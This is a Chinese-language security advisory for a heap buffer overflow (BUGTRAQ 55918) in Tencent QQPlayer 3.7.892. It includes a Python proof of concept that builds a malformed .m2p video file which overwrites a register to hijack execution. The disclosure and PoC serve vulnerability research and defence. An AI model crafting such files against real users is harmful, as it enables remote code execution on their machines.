发布日期：2012-10-14
更新日期：2012-10-16

受影响系统：

Tencent QQ影音

描述：

---

BUGTRAQ  ID: 55918

QQ影音(QQPlayer)是腾讯公司推出的一款支持任何格式影片和音乐文件的本地播放器。

QQPlayer 3.7.892及其他版本存在堆缓冲区溢出漏洞，成功利用后可允许远程攻击者在受影响应用的上下文中执行任意代码。

<*来源：James Ritchey
  *>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

l = 3315716 * "A"
s1 = ((0,'\x00\x00\x01\xba'), (2048, '\x00\x00\x01\xba'),
      (3289120, '\x00\x00\x01\xe0\x07'), (3289273, '\x00\x00\x01\xb3'),
      (3289283, '\xba'), (3289452, '\x42\x42\x42\x42'),
      (3289468, '\x00\x00\x01\x00'), (3290359, '\x00\x00\x01\x00'),
      (3301408, '\x00\x00\x01\xe0\x07'), (3303112, '\x00\x00\x01\x00'))
# EAX overwrite(3289452, '\x42\x42\x42\x42') call eax+0x24

o = open("c:\\poc.m2p","wb")
o.write(l)

for i in range(len(s1)):
    o.seek(s1[i][0], 0)
    o.write(s1[i][1])

o.close()

建议：

---

厂商补丁：

Tencent
-------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://im.qq.com/qq/dlqq.shtml

浏览次数：3942
严重程度：0（网友投票）